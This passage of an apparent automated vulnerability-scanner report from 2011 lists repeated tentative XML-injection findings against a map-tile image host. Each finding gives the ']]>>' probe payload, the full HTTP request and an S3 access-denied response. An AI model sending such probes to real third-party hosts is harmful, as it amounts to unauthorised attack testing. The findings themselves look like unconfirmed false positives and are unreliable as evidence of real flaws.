X-Amz-Cf-Id: 1b27eb7bd6bbd3cc7ca2f949997cab04cb3e1365be008b28cd8caafe1d579ae188258fc3519c57d5
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA75D20F251D3313</RequestId><HostId>F1Qzp/B3uJDPcVtlTLCpgI0D9xJnBSbLItEtu4uCAoS2Y6mjz9
...[SNIP]...

8.237. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: DDD7E314CE363AB0
x-amz-id-2: Irx4mVSe98b6OSb6VosVU3uzyH49+SLmgrPgMSDsItT6WBXsdzl7T0eehFQBEL3M
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 035621eeb7367c31231964e16f9b7ef7ca7f88388066f7951e534d0c962df80573bfb89cdfb3a9fa
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>DDD7E314CE363AB0</RequestId><HostId>Irx4mVSe98b6OSb6VosVU3uzyH49+SLmgrPgMSDsItT6WBXsdz
...[SNIP]...

8.238. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 349324ED7D97395E
x-amz-id-2: KAzkdmch3XTWe/8tF42MRzxevfAxX+jO8T3mY+aZrvZxbYE04XH5iYRmfL1GzT+v
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b5bd6396c4249fe46fe0d009a626b95b73c7175538e078d4eb86ab6bf927a76877b46382496eaf17
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>349324ED7D97395E</RequestId><HostId>KAzkdmch3XTWe/8tF42MRzxevfAxX+jO8T3mY+aZrvZxbYE04X
...[SNIP]...

8.239. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 912FDC8C3899DDC1
x-amz-id-2: BRqaVDHEiMqgbxEYqMP1KCDQJhXNB+a1HngPNuMj41XcZvfmfBQmPJtZC8J+sxcm
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d13b39e953e9b0bcd520389503da2b2a8ad507c4be48e3dabc3c8cf5fa05f37e632d982aa39b6c9e
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>912FDC8C3899DDC1</RequestId><HostId>BRqaVDHEiMqgbxEYqMP1KCDQJhXNB+a1HngPNuMj41XcZvfmfB
...[SNIP]...

8.240. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154380y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8662F874A765766D
x-amz-id-2: JPI3yZWhaYPmpnhWXars23IlpOATN8L7fUGskRGrk/6Zoetx76TxxO+ML0huvFxs
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 331fee311250467e0acb9557defaa9aca10c8f7695b128fb7412f5008a39aca82c9e270233c1a015
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8662F874A765766D</RequestId><HostId>JPI3yZWhaYPmpnhWXars23IlpOATN8L7fUGskRGrk/6Zoetx76
...[SNIP]...

8.241. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 8DA3D60F961DBCE8
x-amz-id-2: pqMkVwtP/F5O1QJSrIjeWV5OhsjVexwo+RvKtVVCTLKHIaTLP/OUDNw88FizsUii
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:07 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 064de28262c3d7c35b28c7884b28c57246f791b0214cb509e106219d0f1f64177f672b0b255a2ac9
Via: 1.0 2fba667ca1ec01169aa22099159a4375.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>8DA3D60F961DBCE8</RequestId><HostId>pqMkVwtP/F5O1QJSrIjeWV5OhsjVexwo+RvKtVVCTLKHIaTLP/
...[SNIP]...

8.242. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 02FE6D0DE0D6E128
x-amz-id-2: Oa6tE6PzO+N61PfX3mcZrFA6uw6kdgt9tagGGqKa/jY07HdScJ2Hdi9/qSZZ9fwu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0812c5f7891bad9edfb85f4f4df4d1ce393f6f8852789b5baac68de26a1de852075f14936438bd73
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>02FE6D0DE0D6E128</RequestId><HostId>Oa6tE6PzO+N61PfX3mcZrFA6uw6kdgt9tagGGqKa/jY07HdScJ
...[SNIP]...

8.243. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 55CD14F25FA5F1B5
x-amz-id-2: RxtgB3UBiNchAeEXxhXTil1hHyj92gbyQD6o3o2XU6E64Q7F+A384AkGer3Amr5U
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 35fd6a238ebf0e2496977e90178ac91ab74f8b0c4902cd83bf621aa7039cc4d567e34508f37fa0d0
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>55CD14F25FA5F1B5</RequestId><HostId>RxtgB3UBiNchAeEXxhXTil1hHyj92gbyQD6o3o2XU6E64Q7F+A
...[SNIP]...

8.244. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: FA340FB588BC2004
x-amz-id-2: tECr+Gt7YHZ6fFhgaRUQe30XOuMb6CzbRTcpj3Ilgq3rd7O6RaqSlITYr2P/xM/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f6d5f921350574558832e2d0fe2197e619764ddcc5566b6b597f62380be0e78d763e430bec7553e2
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>FA340FB588BC2004</RequestId><HostId>tECr+Gt7YHZ6fFhgaRUQe30XOuMb6CzbRTcpj3Ilgq3rd7O6Ra
...[SNIP]...

8.245. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 231C5BAEDDBB8442
x-amz-id-2: F+wwWY3cv+6hv+uCP13/ENtEN5lX7CVvWMD7YcTb+PJLr3qMszpWSpSwHO0PgZOu
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 24fb5237983cc35c4741d6e71bc0a6e007b4a10283fc033eca3000cf60c22a046fd2a6cf22c69100
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>231C5BAEDDBB8442</RequestId><HostId>F+wwWY3cv+6hv+uCP13/ENtEN5lX7CVvWMD7YcTb+PJLr3qMsz
...[SNIP]...

8.246. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: CD2056B39ACDE483
x-amz-id-2: ePsmkPyOfmNZ10+JnQWgMe0BOebaX/5OweUx9qws6nVembppt1um4eltkHZjvgeo
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:04 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4e25d5af4b2b1d0827d2656a2939c5e7b725d7606590262c8e38279d67f6adb59decc1bec9c2cde2
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CD2056B39ACDE483</RequestId><HostId>ePsmkPyOfmNZ10+JnQWgMe0BOebaX/5OweUx9qws6nVembppt1
...[SNIP]...

8.247. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154381y197048.png?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4A947EC186FB6207
x-amz-id-2: 08G5jCn6zcj9NWWMrjTeV+RyaqgMhrLN3VL+d6Z3xAybnpHk4jsG+2U3gaF4oHNP
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bcae26b2798b08d64a42db4eb38c4c199f215e177ef211d29ea45d6582850681e5dfe56175f483f4
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4A947EC186FB6207</RequestId><HostId>08G5jCn6zcj9NWWMrjTeV+RyaqgMhrLN3VL+d6Z3xAybnpHk4j
...[SNIP]...

8.248. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png]]>>?1311100430733 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 689DE2252E80DAA0
x-amz-id-2: c9dksLPMz+veNP8K8bwOdDD1ru5UTsVHVvo66XZ8DWTSanfW6U3Ck5iLLgJd/Gph
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:09 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e386ad49890f50d79b9adfe807d7a3ba1e2636dede173e934098ee1403f5d47da0b0e2b8c5c62093
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>689DE2252E80DAA0</RequestId><HostId>c9dksLPMz+veNP8K8bwOdDD1ru5UTsVHVvo66XZ8DWTSanfW6U
...[SNIP]...

8.249. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: D96ADA01DCE10829
x-amz-id-2: NL9YPur0WCktV0QQjs6RkugsBRkvCpXmCaQfx0qfCo/6LfnFfTLMT9tIVxYaCPAS
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:51 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6f0df2eb784159afee8c88b200a80f2e652f27d3c6f66fed96ac597a65fc34c26668c32189d02cf1
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>D96ADA01DCE10829</RequestId><HostId>NL9YPur0WCktV0QQjs6RkugsBRkvCpXmCaQfx0qfCo/6LfnFfT
...[SNIP]...

8.250. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png?1311100430734 HTTP/1.1
